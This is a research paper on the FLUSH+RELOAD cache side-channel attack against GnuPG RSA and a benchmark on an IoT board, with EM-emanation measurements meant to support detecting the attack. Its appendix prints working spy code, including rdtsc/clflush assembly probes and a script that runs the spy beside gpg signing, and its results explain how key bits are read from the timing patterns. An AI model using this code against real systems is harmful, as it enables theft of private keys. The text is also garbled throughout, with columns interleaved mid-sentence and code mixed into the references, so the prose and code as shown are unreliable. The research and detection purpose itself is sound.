Analysis of EM Emanations from Cache Side-Channel Attacks on IoT Devices

Moumita Dey School of Electrical and Engineering, Georgia Institute of Technology, Atlanta, USA [email protected]

Abstract— As the days go by, the number of IoT devices are growing exponentially and because of their low computing capabilities, they are being targeted to perform bigger attacks that are compromising their security. With cache side channel attacks increasing on devices working on different platforms, it is important to take precautions beforehand to detect when a cache side channel attack is performed on an IoT device. In this paper, the FLUSH+RELOAD attack, a popular cache side channel attack, is first implemented and the proof of concept is demonstrated on GnuPG RSA and bitcnts benchmark of MiBench suite. The effects it has are then seen through EM emanations of the device under different conditions. There was distinctive activity observed due to FLUSH+RELOAD attack, which can be identified by profiling the applications to be monitored.

INTRODUCTION Fig. 1. IoT devices demand trend [1] The Internet of Things (IoT) is the next frontier in technology, and there’s already several companies trying to capitalize it. Its a network of products that are connected to the Internet, thus they have their own IP address and can GitHub, Netflix, Shopify, SoundCloud, Spotify, Twitter, and connect to each other to automate simple tasks. As prices a number of other major websites. This piece of malicious of fall and connectivity technology develops, code took advantage of devices running out-of-date versions more machines are going online. Appearance of smart ob- of the Linux kernel and relied on the fact that most users jects is the main driver of IoT industry’s development. The do not change the default usernames/passwords on their number of IoT devices connected will increase to 25 billion devices. Verizon Wireless released a report that included an by 2020 [1]. unnamed university that saw more than 5,000 IoT devices The true value of the Internet of Things does not lay in attacked. When senior members of the campus IT staff the lights turning on when the car reaches the driveway, started receiving numerous complaints about slow or inac- but rather the data that the connected devices collect about cessible network connectivity, they discovered their name its users. The collection of data from devices will allow servers were producing a high volume of alerts and showed consumers, businesses and even entire connected cities to an abnormal number of sub-domains related to seafood. It run more efficiently. However, collecting large amounts of turned out more than 5,000 discrete systems were found to data presents challenges. With the collection of data come be making hundreds of DNS lookups every 15 minutes. The major privacy and security concerns for consumers. [2] botnet spread via brute force attack to break through weak IoT devices usually run on low power and computing capa- passwords on IoT devices. [4] bilities. Running anti-virus software and malware-detection With side channel attacks gaining popularity on vari- software take up a lot of its computing power, which makes it ous computing platforms, generally trying to break private difficult to monitor the security of IoT devices. Hence these keys of various cryptographic algorithms, it is simply a devices aren’t being developed with security in mind, which matter of time that a cache side channel attack such as leaves lots of rooms for vulnerabilities. Attackers are fully FLUSH+RELOAD, that extracts cryptographic keys based aware of this reality and scan networks for vulnerable device on the information obtained from the memory access pat- connections. [3] tern, is performed on IoT devices, thereby compromising Attacks on IoT devices are increasing everyday. One their security. This paper uses this motivation and tries to such attack was the Mirai botnet. This particular botnet propose a solution to this problem of IoT security, using the infected numerous IoT devices (primarily older routers and useful information obtained from physical electromagnetic IP cameras), then used them to flood DNS provider Dyn emanations of the IoT device. with a DDoS attack. The Mirai botnet took down Etsy, This paper is organized as follows. Firstly, a background systems, the last level cache is generally the shared cache among all the cores. On architectures, the caches are considered inclusive, meaning that whatever data is contained in a cores L1 cache will also be contained in the cores L2 and L3 caches. Consequently, flushing or evicting data from the last level cache also remove said data from all other cache levels of the processor. To reduce the memory footprint of a system, the system software shares identical memory pages between processes running on the system [6]. When a process accesses a shared page in memory, the contents of the accessed memory location is cached. With page deduplication scheme, the operating system scans memory pages during idle CPU cycles, and looks for pages that are identical in content. It collapses those pages into a single page that is then shared by all processes that were accessing those identical pages. As a result of this page deduplication scheme, processes may be unknowingly or unintentionally sharing memory with one another. However, to prevent malicious access to the shared pages, the operating system maps shared pages as copy-on- write; that is, when a process wishes to write to a page, Fig. 2. Typical CPU cache architecture [8] it must first make a local copy for itself that it can safely modify. required to understand the FLUSH+RELOAD attack, and the C. FLUSH+RELOAD generation and extraction of EM emanations will be pro- Retrieving data from memory or from cache levels closer vided. In the next section, the implementation of the attack to memory takes longer than retrieving it from cache lev- on the IoT device will be discussed. In the third section, els closer to the core. This difference in timing has been the experimental setup to obtain the EM emanations will exploited for side-channel attacks. Such attacks have been be described. In the fourth section, the results of the attack performed by interpreting the time difference based on the will be explained. All related work to the FLUSH+RELOAD prior known state of the cache. FLUSH+RELOAD heavily attack will be discussed in the fifth section. In the subsequent relies on this time difference. sections, the takeaway from this paper, and the future work Another feature that FLUSH+RELOAD relies is on page that can be built up on the preliminary results from this paper sharing across processes, in this case, the spy and the will be discussed. victim processes. With shared pages, the spy can ensure I.BACKGROUND that a memory line has been evicted out of the entire cache hierarchy. A. CACHE SIDE CHANNEL ATTACKS The entire attack is performed in three stages. In the first Side channel attack is an attack that tries to obtain infor- stage, the spy clears the line that is being monitored out of mation about the application of interest, without changing the entire cache. In Intel x86 systems, this is done using the application execution behavior. For example, timing the clflush special instruction. clflush invalidates the cache information, power consumption, electromagnetic leaks or line that contains the linear address specified with the source even sound can provide an extra source of information, which operand from all levels of the processor cache hierarchy (data can be exploited to break the system. General classes of side and instruction) [7]. The invalidation is broadcast throughout channel attacks include cache side channel attacks, timing the cache coherence domain. If, at any level of the cache attacks, power-monitoring attack, electromagnetic attack and hierarchy, the line is inconsistent with memory (dirty) it is so on. Cache attack is an attack based on attacker’s ability written to memory before invalidation. to monitor cache accesses made by the victim in a shared In the second stage, the spy waits for the victim to execute physical system as in virtualized environment or a type of the application and perform accesses to the intended memory cloud service. [6] The FLUSH+RELOAD attack is a type of line. The wait period is decided by the attacker. If the wait cache side channel attack targeting x86 systems. period is too long, there might be multiple accesses to the same memory line but the spy may just identify it as a single B. x86 MEMORY SYSTEM memory access by the victim. If the wait time is too short, In modern computer architectures, the cache is typically there might be a higher risk of cutting out the victim when laid out in multiple levels, generally referred to as L1, L2 it is mid-way performing the access to the memory line. and so on, with the subsequent levels of caches larger than In the third stage, the spy reloads the memory line. The the lower levels as shown in Fig.2. In the case of multi-core spy calculates the time difference between the third and the Fig. 3. Spectrogram for Basicmath benchmark with large (profiling run) Fig. 4. Exponentiation by and Multiply. [6] inputs. [9]

spikes characteristic for each loop appear and disappear, first stage. If during the wait period the victim accessed the allowing it to determine when each loop is entered and memory line being monitored, the memory line would have exited. been mapped to the cache when the spy tried to reload the Spectral Profiling [9] monitors EM emanations uninten- line. This means that the time difference will be lesser and tionally produced by the profiled system, looking for spectral will correspond to a cache hit. On the other hand, if the spikes produced by periodic program activity (e.g. loops). victim did not access the intended memory line, the spy will This allows Spectral Profiling to determine which parts of have to bring the memory line from the main memory to the program have executed at what time. By analyzing the the cache during the reload phase. Hence the time difference frequency and shape of the spectral spike, Spectral Profiling will be much more than what it would have been in the can obtain additional information such as the per-iteration case of a cache hit. This time corresponds to a cache miss. execution time of a loop. The advantage of Spectral This process continues for many accesses and the spy keeps Profiling is that it can monitor a system as-is, without logging down the values of the time difference. In this way, program instrumentation, system activity, etc. associated with the spy tries to find out if the victim accessed the memory the profiling itself, i.e. it completely eliminates the Observers line or not. [6] Effect and allows profiling of programs whose execution is performance-dependent and/or programs that run on even the D. PHYSICAL EM SIDE CHANNEL simplest embedded systems that have no resources or support Electronic circuits within generate EM em- for profiling. anations as a side-effect of current flows. Since current flows in the systems can vary with program activity, these II. IMPLEMENTATION EM emanations often convey important information about The first part of this paper is to replicate the original program activity in the system. Most research work on EM works of the FLUSH+RELOAD attack in [6]. The original emanations has focused on the risks they create as a side implementation tried to extract the private keys channel, i.e. as a way for attackers to extract sensitive data from the then latest GnuPG RSA implementation. This will values (such as cryptographic keys) from the system and on be implemented in this paper too to show a proof of concept countermeasures against such attacks, primarily for smart- of the FLUSH+RELOAD attack on the IoT device. To further cards used for authentication and payments [9]. Beyond extend this concept, the FLUSH+RELOAD attack will be extracting sensitive data values, side-channel emanations demonstrated on the bitcnts application of the MiBench have also been used to learn more about program behavior, benchmark suite [10]. e.g. to identify webpages during browsing or find anomalies This section first explains the control flow of the GnuPG in software activity without attributing emanations to specific RSA Implementation and the bitcnts benchmark of the parts of the code. MiBench benchmark suite. It then explains the implemen- The key insight in spectral profiling is that repetitive tation of the FLUSH+RELOAD attack. program activity (e.g. a loop) causes the unintentional EM A. GnuPG RSA IMPLEMENTATION signals to exhibit periodicity, i.e. the spectrum of these EM signals will have “spikes” at frequencies that correspond to RSA [48] is a public-key cryptographic system that sup- the time spent in each repetition of the program activity ports encryption and signing. Generating an encryption sys- as illustrated in Fig.3. Spectral profiling relies on training tem requires the following steps: with known inputs to identify the spike frequencies that • Randomly selecting two prime numbers p and and are characteristic for each loop. During profiling, Spectral calculating n = pq. Profiling monitors the spectrum in real time to identify when • Choosing a public exponent e. GnuPG uses e = 65537. Fig. 5. GnuPG 1.4.13s implementation of Square-and-Multiply Fig. 6. FLUSH+RELOAD spy function

−1 • Calculating a private exponent d = e (mod(p−1)(q− 1)). The generated encryption system consists of: • The public key is the pair (n; e). • The private key is the triple (p; q; d). e • The encrypting function is E(m) = (m )mod(n). d • The decrypting function is D(c) = (c )mod(n). To compute the encryption and decryption functions, GnuPG versions before 4.1.14 and the related be- fore version 1.5.3 use the square-and-multiply exponentiation algorithm as shown in Fig.4. As can be seen from the implementation, computing the exponent consists of sequence of Square and Multiply oper- ations, each followed by a Modulo Reduce. This sequence corresponds directly with the bits of the exponent. Each occurrence of Square-Reduce-Multiply-Reduce within the sequence corresponds to a bit whose value is 1. Occurrences of Square-Reduce that are not followed by a Multiply Fig. 7. FLUSH+RELOAD probe timing function [6] correspond to bits whose values are 0. Consequently, a spy process that can trace the execution of the square-and- multiply exponentiation algorithm can recover the exponent. C. THE ATTACK The ideal probing addresses are the ones that are always executed when the targeted operations (mpih sqr n basecase, The FLUSH+RELOAD attack was adapted from the orig- mpihelp divrem, and mpihelp mul karatsuba case) are exe- inal probe function provided in the original paper. cuted, which are the square, reduce and multiply functions Firstly, the addresses to be probed for the selected ap- respectively as shown in Fig.5. plication were calculated by creating breakpoints using gdb on the desired lines. Three memory addresses corresponding B. MiBench bitcnts BENCHMARK to their function calls were stored in a text file. A script is run such that it starts the spy that keeps probing the memory MiBench has many similarities to the EEMBC benchmark lines in the probe file in fixed intervals of time. After suite. It consists of six categories including: Automotive some time, the script invokes the application to run as another and Industrial Control, Network, Security, Consumer De- process on another core. Meanwhile the spy keeps probing vices, Office Automation, and Telecommunications. These the memory lines and keeps storing the time information to categories offer different program characteristics that enable an output file. After some time, the spy stops once it is done researchers in architecture and compilers to examine their probing a set number of probe accesses. designs more effectively for a particular market segment. [10] The spy function is implemented as shown in Fig.6. Before The bit count algorithm tests the bit manipulation abilities calling this function, the application binary is mapped, thus of a processor by counting the number of bits in an array the spy creates pages corresponding to the application source. of integers. It does this using five methods including an Based on the initial address of the mapping, the probe optimized 1-bit per loop counter, recursive bit count by address offsets are added to it and the actual virtual addresses nibbles, non-recursive bit count by nibbles using a table look- to be probed and generated. Thus, when the application is up, non-recursive bit count by bytes using a table look-up actually invoked in the script, since there already exists a and shift and count bits. The input data is an array of integers copy of the pages, the processor performs page deduplication with equal numbers of 1s and 0s. and both the processes run from the same set of shared pages. In all, there are seven such function calls present. The As can be seen from the spy function, for every iteration addresses of bit count (LOOP 1), ntbl bitcnt (LOOP 3), and for every probe address, a pointer to the probe address is bit shifter (LOOP 7) were probed to find out the order of passed to the probe timing function, which returns the result the loops being accessed. of the time difference, which in turn is stored in an array that will dump it to the output file. It then waits for a preset number of cycles specified by the user and continues with the process. The probe timing function in Fig.7 is written in asm to provide more control to the timing and the instructions being executed. The assembly code takes one input, the address, which is stored in register %ecx. It returns the time to read this address in the register %eax which is stored in the variable time. During the load, it reads 4 bytes from the memory address in %ecx, i.e. the address pointed byadrs. To measure the time it takes to perform this read, the processors time stamp counter is used. The rdtsc instruction in reads the 64-bit counter, returning the low 32 bits of the counter in %eax and the high 32 bits in %edx. As the times measured are short, the 32 most significant bits in %edx are ignored. This counter value is Fig. 8. MinnowBoard Turbot measurement setup then copied to %esi. After reading the memory, the time stamp counter is read again. It then subtracts the value of the counter before the memory read from the value after the read, leaving the result in the output register %eax. The crux of the technique is the ability to evict specific memory lines from the cache. This is the function of the clflush instruction. The clflush instruction evicts the specific memory line from all the cache hierarchy, including the L1 and L2 caches of all cores. Evicting the line from all cores ensures that the next time the victim accesses the memory line it will be loaded into L3. The purpose of the mfence and lfence instructions is to serialize the instruction stream. The processor may execute Fig. 9. Timing plot of FLUSH+RELOAD on GnuPG RSA instructions in parallel or out of order. Without serialization, instructions surrounding the measured code segment may be For the EM measurement, the setup was made executed within that segment. as shown in Fig.8. The measurements were taken using a The lfence instruction performs partial serialization. It spectrum analyzer. ensures that load instructions preceding it have completed before it is executed and that no instruction following it IV. RESULTS executes before the lfence instruction. The mfence instruction orders all memory access, fence instructions and the clflush First, we will look over the results of the proof of concept instruction. It is not, however, ordered with respect to other that the FLUSH+RELOAD attack is working. Next, we will instructions and is, therefore, not sufficient to ensure ordering look at the EM effects it has on the IoT device. In the end, a minor change has been performed. The A. TIMING ANALYSIS original probe timing function output the result only if it was less than a threshold, which corresponded to the cache Fig.9 shows all the time differences obtained for the three hit timing. Instead, we output all the time results obtained. functions for GnuPG RSA. There is a huge variation in the III. EXPERIMENTAL SETUP The IoT device used for this paper is the MinnowBoard Turbot. It is a dual-core Intel Atom E3826 processor based device with the cores fixed at 1.46 GHz for this specific work. It has a 32 KB 8-way L1 instruction cache and 24 KB 6-way L1 data cache per core. It also has a 1 MB, 16-way Fig. 10. Zoomed timing plot of FLUSH+RELOAD on GnuPG RSA L2 cache, shared per two cores and 2 GB DDR3L SDRAM. [11] The board runs lubuntu [12], which is a fast and lightweight Ubuntu based operating system. Lubuntu uses the minimal desktop LXDE, and a selection of light applications. We focus on speed and energy-efficiency. Because of this, Lubuntu has very low hardware requirements. Fig. 11. Zoomed timing plot of FLUSH+RELOAD on Bitcnts Fig. 14. EM frequency spectrum from GnuPG RSA - zoomed

Fig. 12. EM frequency spectrum from bitcnts

Fig. 15. EM frequency spectrum from GnuPG RSA and bitcnts running simultaneously Fig. 13. EM frequency spectrum from GnuPG RSA

To show the effect of another application running in addi- time slots as some of them are memory accesses leading to tion to the intended application, bitcnts was run simultane- very big access times, whereas the others are spread over ously with RSA. In this case of Fig.15, the sign and encrypt different levels of cache accesses. stages are not very clear due to the interference from bitcnts, A small zoomed portion of this looks like Fig.10. The pat- but in the regions where the RSA signal is weaker, the bitcnts terns of the probe accesses have been labeled as S(Square), loops are visible. However when the FLUSH+RELOAD R(Reduce) and M(Multiply). The pattern SRMR correspond attack is also performed, and when the frequencies around to the bit 1 and the pattern SR without an MR correspond the clock are zoomed into as shown in Fig.16, the loops from to the bit 0. In this way, the bits can be recovered. bitcnts and probing can be distinguished. Fig.11 shows the zoomed in portion of FLUSH+RELOAD V. RELATED WORK attack on bitcnts benchmark. The order of the loops identified have been labeled. Since the resolution of the loops is not as There have been multiple attacks mainly aimed to extract high as that of RSA execution, some loops are missing, but private keys of various cryptographic algo- the order is still maintained. Hence it can be confirmed that rithms. the FLUSH+RELOAD attack was successfully implemented. In the FLUSH+RELOAD paper, the attack was used to extract private encryption keys from a victim core run- B. EM ANALYSIS ning GnuPG RSA implementation [6]. Cross-VM, cross- core attack on various versions GnuPG were performed In Fig.12, the loops of interest have been labeled. The EM emanations with FLUSH+RELOAD shows more activity around the center clock frequency. It also shows some activity that becomes prominent after the application is done executing. In the case of RSA in Fig.13, the sign and encrypt stages are clearly differentiable without probing, but with probing, there is more activity and no clear differentiation between the encrypt and sign stages. There are also some loops seen during the application execution, and loops appear after RSA has executed, similar to the ones seen in Fig.12. If zoomed into the area closer to the clock, the loops from probing Fig. 16. EM frequency spectrum from GnuPG RSA and bitcnts running appear as shown in Fig.14. simultaneously - zoomed in [13] using FLUSH+RELOAD implementation. Attack on OpenSSL ECDSA in [14] was also performed using #define MAX_NUM_OF_ADDRS 10u FLUSH+RELOAD. AES keys were also extracted using #define TIME_SLOTS 50000

cache side channel attack in [15]. #define busy_wait(cycles) Apart from cryptographic applications, FLUSH+RELOAD for(volatile long i_ = 0; i_ != cycles; i_++)\ attack has also been used to find the Wikipedia page being ; accessed in [16]. It has been also used in identifying the int probe(char *adrs) { printed letters in a dot matrix printer in [17]. volatile unsigned long time; asm __volatile__( VI.CONCLUSIONS AND FUTUREWORK " mfence \n" " lfence \n" In this paper, the FLUSH+RELOAD attack was imple- " rdtsc \n" mented. The attack was first demonstrated on the original " lfence \n" " movl %%eax, %%esi \n" GnuPG RSA implementation and on the bitcnts benchmark " movl (%1), %%eax \n" of the MiBench benchmark suite. The EM emanations were " lfence \n" " rdtsc \n" then observed for three cases: bitcnts, RSA, bitcnts+RSA, " subl %%esi, %%eax \n" all with and without the FLUSH+RELOAD attack. It was " clflush 0(%1) \n" : "=a" (time) seen that there was additional activity throughout which was : "c" (adrs) especially prominent near the clock. Even after the applica- : "%esi", "%edx" ); tion was done with its execution, there were prominent loops return time; present due to the continuous probing. } Since there were promising outcomes out of this paper, unsigned long probe_timing(char *adrs) { the next steps are to develop a profiling and identification volatile unsigned long time; algorithm for FLUSH+RELOAD attack on different applica- asm __volatile__( tions using Spectral Profiling. It is suspected that the highly " mfence \n" " lfence \n" periodic spectrum is because of the repetitive probing for the " rdtsc \n" entire duration of the application run. It will be interesting " lfence \n" " movl %%eax, %%esi \n" to see the effects of non-continuous probing; its effects both " movl (%1), %%eax \n" on the effectiveness of the FLUSH+RELOAD attack, and on " lfence \n" " rdtsc \n" its corresponding EM emanations. " subl %%esi, %%eax \n" " clflush 0(%1) \n" APPENDIX : "=a" (time) : "c" (adrs) This section contains the code used for implementing : "%esi", "%edx" ); the FLUSH+RELOAD attack. The code was improved from return time; [18]. The files changed have been listed. } ------typedef struct { run.sh [script used for attack] unsigned long result[MAX_NUM_OF_ADDRS]; } time_slot; #!/bin/sh void spy(char **addrs, size_t num_addrs, set -o errexit time_slot *slots, size_t num_slots, set -o xtrace int busy_cycles) { set -o nounset for (size_t slot = 0; slot < num_slots; slot++) { for (int addr = 0; addr < (int) num_addrs; addr++) GPG=build_gpg/gnupg-1.4.12/bin/gpg { ADDR=docs/addr/try1.txt char *ptr = addrs[addr]; MESSAGE=message.txt unsigned long result = probe_timing(ptr); OUT=out.txt slots[slot].result[addr] = result; CYCLES=$1 } busy_wait(busy_cycles); bin/probe "${GPG}" ${ADDR} ${OUT} "${CYCLES}" & } PROBE_PID=$! } sleep 0.01 void write_slots_to_file(size_t num_addrs, (echo "GPG start"; ${GPG} --yes --default-key minnow \ time_slot *slots, size_t num_slots, --sign ${MESSAGE}; echo "GPG end") & FILE *out_file) { GPG_PID=$! for (size_t slot = 0; slot < num_slots; slot++) { for (size_t addr = 0; addr < num_addrs; addr++) { trap "echo ’Received signal’; \ unsigned long result = slots[slot].result[addr]; kill -TERM ${PROBE_PID} ${GPG_PID}" INT QUIT fprintf(out_file, "%lu %lu %lu\n", slot, addr, result); } wait ${PROBE_PID} } wait ${GPG_PID} } ------probe.c [main function] void offset_addresses(void *gpg_base, char **addrs, size_t num_addrs) { #define GPG_MAX_SIZE_BYTES 4194304 for (size_t i = 0; i < num_addrs; i++) { unsigned long ptr_offset = (unsigned long)gpg_base; #define PROBE_THRESHOLD 100ul char *adjusted_ptr = addrs[i] + ptr_offset; [4] Jack Wallen, ZDNet, http://www.zdnet.com/article/5- addrs[i] = adjusted_ptr; nightmarish-attacks-that-show-the-risks-of- } iot-security/, Last accessed December 11, 2017. } [5] https://en.wikipedia.org/wiki/Side-channel_ attack, Last accessed December 11, 2017. int main(int argc, char *argv[]) { struct args_st arguments; [6] Yarom, Yuval, and Katrina Falkner. “FLUSH+ RELOAD: A High if (!read_args(&arguments, argc, argv)) { Resolution, Low Noise, L3 Cache Side-Channel Attack.” USENIX return 1; Security Symposium. 2014. } [7] http://www.felixcloutier.com/x86/CLFLUSH.html, Last accessed December 11, 2017. size_t map_len = GPG_MAX_SIZE_BYTES; [8] Gernot Heiser, microkerneldude, https://microkerneldude. void *gpg_base = mmap(NULL, map_len, PROT_READ, wordpress.com/2015/04/27/how-to-steal- MAP_FILE | MAP_SHARED, encryption-keys-your-cloud-is-not-as-secure- arguments.gpg_fd, 0); if (gpg_base == MAP_FAILED) { as-you-may-think/, Last accessed December 11, 2017. perror("mmap"); [9] Sehatbakhsh, Nader, Alireza Nazari, Alenka Zajic, and Milos return 1; Prvulovic. “Spectral profiling: Observer-effect-free profiling by mon- } itoring EM emanations.” In Microarchitecture (MICRO), 2016 49th printf("GPG binary mmapped to %p\n", gpg_base); Annual IEEE/ACM International Symposium on, pp. 1-11. IEEE, 2016. char *addrs[MAX_NUM_OF_ADDRS]; [10] Guthaus, Matthew R., Jeffrey S. Ringenberg, Dan Ernst, Todd M. size_t num_addrs = read_addrs(arguments.addr_file, addrs, MAX_NUM_OF_ADDRS); Austin, Trevor Mudge, and Richard B. Brown. “MiBench: A free, if (num_addrs == 0) { commercially representative embedded benchmark suite.” In Workload fprintf(stderr, "Did not read any addresses Characterization, 2001. WWC-4. 2001 IEEE International Workshop from file\n"); on, pp. 3-14. IEEE, 2001. return 0; [11] minnowboard.org, https://minnowboard.org/ } minnowboard-turbot/technical-specs, Last accessed December 12, 2017. printf("Probing %lu addresses:\n", num_addrs); [12] lubuntu, http://lubuntu.net/, Last accessed December 12, for (size_t i = 0; i < num_addrs; i++) { printf("%p\n", addrs[i]); 2017. } [13] Liu, Fangfei, Yuval Yarom, Qian Ge, Gernot Heiser, and Ruby B. Lee. “Last-level cache side-channel attacks are practical.” In Security and offset_addresses(gpg_base, addrs, num_addrs); Privacy (SP), 2015 IEEE Symposium on, pp. 605-622. IEEE, 2015. printf("Here are the offset addresses [14] Yarom, Yuval, and Naomi Benger. “Recovering OpenSSL ECDSA (respectively):\n"); Nonces Using the FLUSH+ RELOAD Cache Side-channel Attack.” for (size_t i = 0; i < num_addrs; i++) { IACR Cryptology ePrint Archive 2014 (2014): 140. printf("%p\n", addrs[i]); [15] Osvik, Dag Arne, Adi Shamir, and Eran Tromer. “Cache attacks and } countermeasures: the case of AES.” In Cryptographers Track at the printf("Started spying\n"); RSA Conference, pp. 1-20. Springer, Berlin, Heidelberg, 2006. time_slot slots[TIME_SLOTS]; [16] Hornby, Taylor. ”Side-channel attacks on everyday applications: dis- spy(addrs, num_addrs, slots, TIME_SLOTS, tinguishing inputs with FLUSH+ RELOAD.” (2017). arguments.busy_cycles); [17] Backes, Michael, Markus Drmuth, Sebastian Gerling, Manfred Pinkal, printf("Finished spying\n"); and Caroline Sporleder. “Acoustic Side-Channel Attacks on Printers.” In USENIX Security symposium, pp. 307-322. 2010. write_slots_to_file(num_addrs, slots, TIME_SLOTS, [18] https://github.com/DanGe42/flush-reload Last arguments.out_file); accessed December 11, 2017. munmap(gpg_base, map_len); cleanup_args(&arguments); return 0; }

ACKNOWLEDGMENT The author would like to thank Prof Hyesoon Kim for pro- viding the platform to explore this paper. The author would also like to thank her advisors Prof Milos Prvulovic and Prof Alenka Zajic for providing all the resources necessary to carry out this work.

REFERENCES [1] Bernard Moon, SparkLabs Global Venture, https://www. slideshare.net/bernardmoon/internet-of-things- hardware-industry-report-2016, Last accessed December 11, 2017. [2] Hannah Becker, Technology Guide, http://www. technologyguide.com/feature/internet-of- things/, Last accessed December 11, 2017. [3] Robert Smith, News Service, http://www.newsbtc. com/2017/08/14/iot-importance-securing-smart- devices/, Last accessed December 11, 2017.